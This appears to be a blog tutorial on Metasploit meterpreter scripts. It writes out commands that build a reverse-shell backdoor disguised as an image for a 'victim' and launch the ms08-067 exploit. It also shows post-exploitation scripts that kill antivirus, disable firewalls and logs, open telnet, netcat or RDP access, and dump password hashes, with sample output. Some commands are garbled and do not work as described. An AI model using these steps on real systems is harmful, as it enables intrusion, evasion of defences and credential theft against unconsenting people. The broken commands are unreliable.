Information security is a broad field and it involves the penetration testing and computer forensic as well, there are so many tools are available to perform the penetration testing on the target, Metasploit is one of the best tool among them. Meterpreter is a powerful feature of metasploit that uses DLL injection
to communicate over the socket. Meterpreter works on the client-side by
providing a powerful environment to communicate, to transfer files.
A
meterpreter session can be established after successfully exploiting the
host. Available meterpreter scripts on a metasploit database automate
multiple processes, such as:
- Capture the screen
- Keylogging
- File transfer
- Service detection and more
Even
with numerous meterpreter scripts available, you are free to write and
to create your own script that is best suited to your work. Some
important aspects about the meterpreter script would be:
- Written in Ruby programming language
- Located in the metasploit directory
- Meterpreter scripts are creating everyday by different authors click here to check the list.
- Meterpreter scripts are very helpful to automate the process after compromising the host
- Meterpreter scripts are based on API and you can get more information here.
There
are so many meterpreter scripts that are available publicly for you to
use, but if you want to create a new meterpreter script of your own and
for public usage, this is readily doable. All you need to do is to
follow some rules and regulations so that your script does not conflict
with the standard variables. Ruby programming language is a basic need
in order to write a script for meterpreter. Other important rules to
follow are:
- Always use description so that the others will understand it
- Use local variable not global variable
- Always provide help option for better usage
- Keep
in mind the target host (operating system, service pack (if windows),
Kernel (for Unix) ) while creating a script, because all the system’s
software does not contain all types of vulnerabilities
Let
us consider an example: in our scenario, we need to create an infected
file (a backdoor) so that we can send it to the victim. Metasploit
needn’t be that big of a deal; you can even create a backdoor by using
fast-track.
root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
As we have typed all the things in, we can automate the process by creating a new script:
root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#
The result is
the same. It is also possible to create a jpg file but that method is
fast. Since the time-consuming method is repeating the same step, why
not create a script for that to do all these jobs automatically? There
are different meterpreter scripts are available; just look at the
picture below.
This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:
root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc
Beyond this, if we use the manual technique to do then job, then we will need to define:
- The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
- We need to set the remote host manually
- We need to set local host and port manually
After
the execution, the meterpreter session must be active if and only if
the operating system is vulnerable, such as in this case:
Now
in this meterpreter session, we are able to call different scripts. We
can also create our own script as well, as discussed above. Below, I
will show you some of the best meterpreter scripts. These are highly
useful in the process of penetration testing; however, developers are
refining these scripts daily, so be active in the community and on
different blogs and forums to keep yourself updated.
Screenspy Script
This is the basic script that will capture the screen of the victim’s
computer. All you need to do is type in “run screenspy.” To get help of
usage, just type in “run screenspy -h” on the meterpreter screen. After
the execution, Firefox will open with a picture of the victim’s computer
at that moment.
KillAv Script
Killav script
is a pretty famous script. As the name suggests, it will kill (close)
antivirus softwares, so if you don’t want that antivirus’ software to
disturb you, be sure to kill all of these antivirus softwares by using
this script:
meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter >
Killav contains the information
on most of the better known anti-virus’s, but if there is a new
anti-virus, then you will need to edit this script for the best
performance. As before with the script file, we can find the famous
anti-virus exe name:
- winppr32.exe
- winrecon.exe
- winservn.exe
- winssk32.exe
- winstart.exe
- winstart001.exe
- wintsk32.exe
- winupdate.exe
- wkufind.exe
- wnad.exe
- wnt.exe
- wradmin.exe
- wrctrl.exe
- wsbgate.exe
- wupdater.exe
- wupdt.exe
- wyvernworksfirewall.exe
- xpf202en.exe
- zapro.exe
- zapsetup3001.exe
- zatutor.exe
- zonalm2601.exe
- zonealarm.exe
Getcountermeasure Script
Killav is a power script and it can kill a lot of different
anti-virus’s, but the problem is that when you implement killav, windows
may show some types of errors and other alerts, not to mention
firewalls. This is remedied by a wonderful script called
Getcountermeasure:
meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies
OPTIONS:
-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.
Just imagine how powerful this script is! It has an ability to fight
against Firewall, Anti-virus, IPS and even third party firewall that are
so very common nowadays. It is really better than Killav. To use it:
meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
Try to understand the power of this wonderful script: it will remove security logs as well look at the picture.
Gettelnet script
Telnet
is one of the most famous services on the windows operating system. It
will allow a remote connection, so if you want to open telnet on the
victim’s computer for future use, then it is a good script to use.
However, as an advance we can use SSH service for remote connection. We
can also install netcat as a backdoor on a compromised host for future
connections. Use this command to get more help
meterpreter > gettelnet -h
There are a lot of different scripts are available but here we will
discuss only the most important ones. These will help you to understand
the network as well as help you for future connections:
Net Enum- Network Enumeration Script
Netenum is a network enumeration script that is a wonderful script for:
- Domain Name for DNS Forward Lookup
- To Perform DNS Forward Lookup on host list and domain
- The target address range or CIDR identifier
- To Perform DNS lookup of MX and NS records for a domain
- To Perform Service Record DNS lookup for a domain
- To Perform Ping Sweep on IP Range
Checkvm- Check Virtual Machine
Virtual
machines are now an important part of enterprise network and most of
the large (and even small) networks are using them. Checkvm is a script
that will let you monitor the status of the victim, whether on virtual
machine or not. It will also let you see the type of virtual machine.
Here is the output of this case:
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >
Virus Scan Bypass
Bypasses
Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP
folder, adds it to exclusion list and sets it to run at startup. Though
we have discussed two scripts that kill anti-virus protections, it is
good to run different scripts to verify your attack.
meterpreter > run virusscan_bypass -h
Enable RDP- Getgui
If
you want a graphical user interface of the victim’s computer, then you
need to open a service called RDP (remote desktop protocol):
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
Hashdump
Last but not the least: I really don’t want to end this article without
sharing hashdump, in case you want to secure password hashes from the
victim for future use. In some cases, these hashes works on other
platforms:
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
If you have some other wonderful scripts, please share with in the comments!
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.
